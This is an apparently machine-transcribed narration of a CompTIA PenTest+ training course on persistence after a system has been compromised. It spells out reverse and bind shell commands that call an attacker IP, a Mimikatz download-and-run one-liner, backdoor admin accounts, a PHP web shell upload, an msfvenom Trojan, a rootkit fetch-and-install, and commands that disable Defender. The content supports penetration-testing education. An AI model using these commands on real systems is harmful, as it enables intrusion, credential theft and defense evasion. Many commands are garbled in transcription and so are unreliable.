This slide marks the beginning of our section on post-exploitation and lateral movement, focusing on the Objective 5.1 of the CompTIA PenTest plus PT0-003 certification. In this part of the course, we will be diving into the intricacies of how, once initial access has been obtained, a penetration tester can ensure ongoing access. Establishing and maintaining persistence is crucial for many aspects of a penetration test, whether it's for ongoing information gathering, more streamlined exploitation, or simulating more advanced adversaries. Now, we'll move on to our first slide on this topic, an introduction to post-exploitation and persistence. In this section, we'll provide an overview of the post-exploitation phase in penetration testing, emphasizing why it's important to establish and maintain persistence. We'll also cover common techniques and tools used in this phase. This foundational knowledge will set the stage for the practical skills and tactics we will be exploring next. Let's get started.
In our previous discussion, we covered the fundamental aspects of CompTIA PenTest plus PT0-003 certification, particularly focusing on the post-exploitation and lateral movement phase, highlighting the distinct tasks necessary to establish and maintain persistence. Now let's dive into an introduction to post-exploitation and persistence. In this phase of penetration testing, the spotlight is on what happens after an initial breach. This stage is crucial as it allows attackers to establish a foothold within the target system, ensuring they can maintain access over a prolonged period. The importance of establishing and maintaining persistence cannot be overstated. It enables attackers to continue their activities, extract sensitive data, and potentially escalate their privileges without needing to reinfect the system after each reboot or system cleanup. We'll explore common techniques and tools used to achieve persistence, giving you an insight into how attackers think and operate. Understanding these methods is critical for pen testers to effectively identify and mitigate these threats. In the next slide, we'll delve into specific methods such as scheduled tasks on Windows and cron jobs on Linux. Here, you'll learn how these are utilized by attackers to maintain persistence and see real-world examples of how they are created.
Slide 2 dives into the realm of scheduled tasks in Windows and cron jobs in Linux, both pivotal techniques that attackers often use for achieving persistence during the post-exploitation phase. First, let's break down what scheduled tasks and cron jobs are. In the Windows environment, scheduled tasks are automated tasks that the system executes at predefined times or intervals. Attackers can leverage this feature to persistently execute malicious scripts or applications even after the machine is rebooted. For instance, here's a classic example of creating a scheduled task in Windows using the shtasks command. Shell shtasks create tn system update #tc Windows System32 cmed.ex/c start. In this case, a task named System Update is created, which executes a command shell, potentially to download and run malicious payloads each time it's triggered. Moving to the Linux side, cron jobs serve a similar purpose. Cron jobs schedule scripts or commands to run at specified times or intervals. Attackers use this to maintain their foothold on a compromised system. Here's how you might create a cron job in Linux. Shell, crontab del2 dev null, echo 0 path to malicious script.h. Crontab. This command ensures that a malicious script runs at the top of every hour by appending an entry to the existing cron jobs. Understanding these techniques is essential because detecting and mitigating such persistence mechanisms is often the key to securing a system after an intrusion. In the next slide, we will explore how attackers create malicious services for persistence. We'll go through examples for both Windows and Linux to understand how these services can be leveraged maliciously.
All right, moving on from scheduled tasks and cron jobs, let's delve into another common method attackers use to maintain persistence: service creation. This slide will cover how attackers create malicious services in both Windows and Linux environments to ensure their malicious activities can restart with the system, offering them a secure foothold even after reboots. For instance, in Windows, one can use PowerShell to create a service. Here's a command to illustrate. PowerShell, new service, name malicious service, binary file path name, cpash path to malicious.exe. In this example, New service is used to create a service named Malicious service with a specified path to a malicious executable. This service is then set to run automatically, giving the attacker persistent presence on the system. Similarly, in a Linux environment, attackers can create a malicious service by crafting a service unit file and enabling it. For example, bash echo end description malicious service and exec start path / to malicious score script etc/system/malicious.service systemctl enable malicious.service systemctl start malicious.service. Here, a new service unit is defined with description and exec start parameters, which points to an attacker-controlled script. By enabling and starting the service using systemctl, the malicious service is set up to persist across reboots. These methods underscore the need for vigilance in monitoring and managing services within your systems, as they can be powerful tools for attackers seeking persistence. In the next slide, we'll explore reverse shells, which are another advanced technique that attackers utilize to gain remote access to compromised systems. Let's move ahead.
Continuing from our previous discussion on service creation, let's now delve into another critical concept used by attackers, the reverse shell. A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host. This allows the attacker to maintain a connection back to the victim's machine, often bypassing firewalls that might block incoming connections. For example, using Netcat, a utility known for reading from and writing to network connections, we can establish a reverse shell. On the attacker's machine, you would set up a listening port using the command bash nc-lvp4444. Then, on the victim's machine, you would connect back to the attacker. Bash nc attacker IP 4444e bin bash. This command tells the victim's machine to establish a connection to the attacker's IP on port 4444 and execute /bin bash, thereby providing access. Similarly, PowerShell can be used to create a reverse shell on Windows systems. PowerShell $client equals new object system.net sockets.tcpc client attacker IP 4444. Stream equals client.getStream. Writer new object system.io stream writer stream. Reader equals new object system.io stream reader stream. Writer.autoflush equals true, while true cmd equals reader.readline. Outputs invoke expression 2-in-1 outstring $writer.writeline output. Here, a TCP client object is created to connect to the attacker's machine at IP attacker IP on port 4444. Commands sent by the attacker are executed on the victim's machine, and the output is sent back through the established connection. Next, we'll explore another attack technique, the bind shell, which establishes a listening shell on the victim's machine that the attacker can connect to. Let's move on to understand how bind shells work and look at practical examples using Netcat and Python. In the previous slide, we delved into the concept of a reverse shell, explaining how an attacker can establish a connection with a victim's machine by leveraging tools like Netcat and PowerShell. Now let's shift our focus to another form of attack known as a bind shell. Unlike a reverse shell where the victim connects back to the attacker, in a bind shell, the victim's machine opens a specific port and listens for an incoming connection from the attacker. Here's an example of how a bind shell can be established using Netcat. First, on the victim's machine, you would execute shell nc-lvp444e/bin bash. This command starts Netcat in listen mode on port 4444 and executes bin bash when a connection is made. Then, on the attacker's machine, you would connect to the victim's open port using shell nc victim IP 4444. Additionally, a bind shell can be set up using Python. Here's a simple script that accomplishes this. Python import socket subprocess s equals socket.socket.socknet socket.sockstream s.bind0.dodo4444 s.listen1 con @r equals s.accept while true data equals con.receive of 1024 if data.decode utf8.strip lower equal exit break output equals subprocess.get output utf8 con.send output.encode utf8 con.close. This Python script creates a socket, binds it to port 4444, and listens for a connection. Once connected, it continuously receives and executes commands, sending the output back to the attacker until it receives the exit command. In the next slide, we'll explore how attackers often add new user accounts to maintain access to the compromised system. We'll walk through examples of how to add a new user in both Windows and Linux environments.
Continuing from our discussion on how attackers create bind shells to gain remote access, let's now delve into another critical aspect of maintaining unauthorized access: adding new accounts. Slide 6. Adding new accounts. To ensure continued access, attackers often add new user accounts to the compromised system. By adding an account, they can log in directly through legitimate means, avoiding some detection methods that focus on more obvious signs of intrusion. Here's how that can be done. Example: adding a new user in Windows using command prompt. 1. First, they create a new user with the command shellnet user malicious password add. This creates a new user named malicious user with the password malicious password. 2. Next, they add this user to the administrators group to ensure elevated privileges. Shellnet local group administrators malicious user /add. Example: adding a new user in Linux. 1. With similar intentions, attackers use the following commands to add a user in Linux: shell sudo user add -m malicious user -s bin bash. This command creates a new user, malicious user, with a home directory and default shell set to bash. 2. To grant higher privileges, the attacker adds the user to the sudo group, shell sudo user mod -ag sudo malicious user. 3. Finally, to set the user's password, they might use shell echo malicious user malicious password sudo ch passwd. By adding accounts in this manner, attackers can sustain their foothold even if their initial method of access is detected and neutralized. Next, we'll explore methods attackers use to obtain valid account credentials, utilizing tools like Mimikatz and John the Ripper. Continuing from our previous discussion on how attackers can add new accounts to maintain access, let's now explore how they can obtain valid account credentials using various techniques. One widely used technique in the Windows environment involves employing the tool Mimikatz. Mimikatz is a powerful utility that can extract plain-text passwords, hash, PIN codes, and Kerberos tickets from memory. Attackers often use this tool to dump credentials from a compromised system. Here's a common example command: PowerShell invoke expression new object net.web client. Download string https://raw.buacontent.com /mimikatz/master mimikatz trunk 7z. Invoke Mimikatz privilege debug log secure logon passwords. On Linux systems, tools like John the Ripper are frequently utilized to crack password hashes. Dumping password hashes from a Linux system can be the first step before using such a brute force tool. Understanding these methods provides crucial insight into how attackers can further entrench themselves within a system by obtaining legitimate credentials, allowing them to navigate the compromised network with higher privileges and less suspicion. Next, we will delve into registry keys and how attackers use them to achieve persistence in Windows environments.
In the previous slide, we discussed techniques for obtaining valid account credentials with tools like Mimikatz for Windows and John the Ripper for Linux. We illustrated an example of how to dump credentials using Mimikatz. Now, in this slide, we're focusing on how attackers use registry keys for persistence in Windows environments. Registry keys play a crucial role in the Windows operating system, and attackers often manipulate them to maintain persistence. When an attacker gains access to a machine, they may add a registry key that ensures their malicious code runs each time the system starts. For instance, an attacker could use the regexe command to add a malicious entry to the run key in the registry. Reg add HKCU soft Microsoft Windows current version run /v malicious retz c path to malicious.exe. This ensures that the specified malicious executable will run every time the user logs in. Another common method involves using PowerShell to manipulate the registry. For example, an attacker might execute set item property path HKCU software Microsoft Windows current version run name malicious value c path to malicious.exe. Both methods achieve the same result: the persistence of malicious code through the modification of registry keys. In the next slide, we will delve into Command and Control C2 frameworks. We'll explore what C2 frameworks are, some commonly used frameworks such as Cobalt Strike, Metasploit, and Empire, and how attackers set up a C2 server using Metasploit. Stay tuned as we continue to uncover these crucial elements of cyber attack methodologies.
Moving on from our discussion about how attackers leverage registry keys for persistence in Windows, let's delve into Command and Control C2 frameworks in this slide. C2 frameworks are critical tools for attackers, facilitating remote control over compromised systems. Essentially, these frameworks allow attackers to issue commands, exfiltrate data, and maintain control over their malware. Several C2 frameworks are widely used in the industry. Some notable ones include Cobalt Strike, Metasploit, and Empire. To give you a hands-on example, let's explore setting up a C2 server using Metasploit. Here are the steps. 1. First, we launch Metasploit by entering MSF console in the terminal. 2. We then use the multi-handler exploit by typing use exploit/multi-handler. 3. Next, we set the payload type to Windows meterpreter/reverse TCP, which is crucial for establishing a reverse connection. 4. We specify the attacker's IP address with set lhost attacker IP. 5. We also define the listening port using set lport 4444. 6. Finally, we execute the exploit by typing exploit. Using this setup, the attacker can manage remote systems seamlessly through the Metasploit framework, highlighting the effectiveness of these tools in real-world scenarios. Next, we will discuss web shells in the upcoming slide. Now that we have discussed C2 frameworks and how to set up a C2 server using Metasploit, let's move on to another essential concept in penetration testing: backdoors, specifically web shells. Backdoor, web shell. A web shell is a type of malicious script that allows an attacker to execute commands on a web server. It's a popular method for maintaining persistent access on compromised web servers due to its simplicity and effectiveness. Here, we have an example of a basic PHP web shell. PHP. This PHP script takes an incoming HTTP GET request with the parameter CMD and passes its value to the system function, thereby executing it on the server. To upload this web shell to a target web server, you can use a tool like curl. Upload the web shell to the web server. Curl f file equals webshell.php, target upload.php. Once uploaded, accessing the web shell and executing a command is straightforward. For example, to execute the womi command, you would use tap access the web shell curl target //webshell.8womi. This will return the result of the womi command executed on the target web server, effectively providing the attacker with remote command execution capabilities. In the next slide, we will delve into another type of backdoor: Trojans. We will explore how to create and deliver a Trojan using MSF Venom and establish a connection using Metasploit. Let's proceed to that topic now.
Continuing from our previous discussion about web shells, we'll now dive into another type of backdoor: Trojans. Slide 11, Backdoor Trojan. Let's start by understanding what Trojans are and how they function. A Trojan horse, commonly referred to as a Trojan, is a type of malware that disguises itself as legitimate software. Attackers use Trojans to gain unauthorized access to the victim's system, often paving the way for further malicious activities. Now, let's take a look at a practical example of creating a Trojan using MSF Venom, a tool from the Metasploit framework. Here is a command to generate a Trojan executable that establishes a reverse TCP connection to the attacker's machine. Shell MSF Venom -p Windows meterpreter house or attacker IP lport equals 4444 def xe trojan.exe. In this example, NIP Windows meterpreter's reverse TCP specifies the payload. lhost is the IP address of the attacker's machine. lport is the port on which the attacker's machine will listen for the connection. Once the Trojan is created, the next step is to deliver it to the target. There are various ways to deliver a Trojan, including email attachments, download links, or even via social engineering tactics. After the Trojan has been successfully deployed on the target system, the attacker needs to set up a listener on their machine to catch the incoming connection from the Trojan. This can be done using MSF console. Shell MSF console, use exploit multi-handler, set payload Windows/meterpreter reverse TCP, set lhost attacker IP, set lport 4444 exploit. In this sequence, MSF console initiates the Metasploit framework console. Use exploit multi-handler specifies the handler module. The set commands configure the payload, lhost, and lport. Exploit starts the listener, awaiting the reverse connection from the infected machine. This demonstrates how attackers deploy Trojans to maintain persistent access to a compromised system. On the next slide, we will explore rootkits, another sophisticated method for achieving unauthorized access. Slide 12 preview. We will discuss rootkits and their usage. We will focus on different types of rootkits, such as kernel level and user mode rootkits, and provide an example of installing a user mode rootkit on a Linux system. Stay tuned.
As we continue our discussion on persistent threats, let's focus on slide 12, rootkits. Rootkits are a type of malicious software designed to grant unauthorized users access to a computer system while concealing their presence or the presence of other malware. They are often used in conjunction with other forms of malware such as Trojans, which we discussed in the previous slide. There are two primary types of rootkits that we need to be aware of: kernel-level and user-mode rootkits. Kernel-level rootkits operate at the core of the operating system, potentially providing the attacker with the most powerful means of control. These rootkits are deeply embedded into the kernel, making them very difficult to detect and remove. They often modify system calls, which allows them to intercept and alter system activities in real time. User-mode rootkits, on the other hand, run with regular user permissions. While they are easier to detect because they operate at a higher level of the operating system, they still pose significant threats. These rootkits usually replace system files with malicious versions, which can be harder to spot if not checked carefully. Let's look at an example of installing a user mode rootkit on a Linux system, which is often accessible through common command line tools. Bash wget bat example.com/rootkit.tar.gz tar-xevf rootkit.tar.gzev cd rootkit.install.sh. In this example, we are downloading a rootkit from the specified URL, extracting it, navigating to the extracted directory, and executing the installation script. One key takeaway is that rootkits can be incredibly stealthy and dangerous forms of malware that require robust detection and prevention strategies to effectively combat. Next, we'll delve into how attackers use malicious browser extensions for persistence, examining an example of creating a simple malicious Chrome extension. Let's move on to the next slide.
Continuing from our discussion on rootkits, let's dive into another nefarious method attackers use to maintain persistence on a compromised system: browser extensions. Slide 13 focuses on browser extensions and how attackers can exploit them for persistence. Malicious browser extensions can be incredibly stealthy and persistent. By embedding malicious scripts within a seemingly harmless extension, attackers can execute code every time the browser is opened or a specific condition is met. For instance, as shown in the example, attackers might create a simple Chrome extension with a manifest file defining the extension's properties and required permissions. The background script, background.js, listens for tab updates and executes code when a page finishes loading. In this case, it triggers an alert demonstrating the extension's action, but it could easily be more malicious, such as logging keystrokes or redirecting traffic. By embedding malicious code in browser extensions, attackers can ensure their code runs in the context of the user's browser, bypassing some traditional security measures and maintaining persistence on the victim's system. Next, we'll explore more methods attackers use to tamper with security controls to maintain access, including disabling defenses like Windows Defender or adding exceptions to antivirus configurations. Now, let's move to slide 14.
On the previous slide, we discussed how attackers can use malicious browser extensions to achieve persistence. We walked through an example of creating a simple malicious Chrome extension that executes a script when a tab is updated, effectively allowing the attacker to execute arbitrary code within the browser environment. Moving on to this slide, we're going to discuss various techniques for tampering with security controls to maintain access. Attackers often look for ways to disable or bypass security controls like antivirus software or firewalls to avoid detection and maintain their foothold on a compromised system. For instance, one common approach is to disable Windows Defender using PowerShell. The command set mp preference disable real-time monitoring true can be used to turn off real-time monitoring, effectively neutralizing one of the primary defenses on a Windows system. Another approach is to add exceptions to antivirus software, such as ClamAV, by appending a specific file path to the ClamAV configuration file and restarting the service with systemctl restart clamavdaemon, an attacker can ensure their malicious file is not scanned, thereby avoiding detection. Understanding these tampering techniques is crucial for penetration testers, as it helps in identifying and mitigating similar strategies employed by malicious actors. In the next slide, we will conclude and review the persistence techniques we've covered and discuss the importance of maintaining access during penetration testing. We'll also look at the next steps and resources for further learning.
Now that we've discussed various techniques for tampering with security controls to maintain access, such as disabling Windows Defender with PowerShell or adding exceptions to antivirus software like ClamAV, let's move on to our final slide. Slide 15 brings us to the conclusion and review of our course on persistence techniques in penetration testing. We've covered numerous methods to help you understand how attackers maintain access to compromised systems. Maintaining access once a system has been penetrated is critical in real-world scenarios, as it allows for continued observation and exploitation. This step is essential not only for attackers, but also for penetration testers to thoroughly assess vulnerabilities and provide comprehensive security recommendations. For next steps, I encourage you to continue learning by exploring more specialized topics in penetration testing. Consider delving deeper into individual tools and techniques, and stay up to date with new methods as they emerge in the cybersecurity landscape. Thank you for participating in this course, and I hope it has provided you with valuable insights into persistence in penetration testing.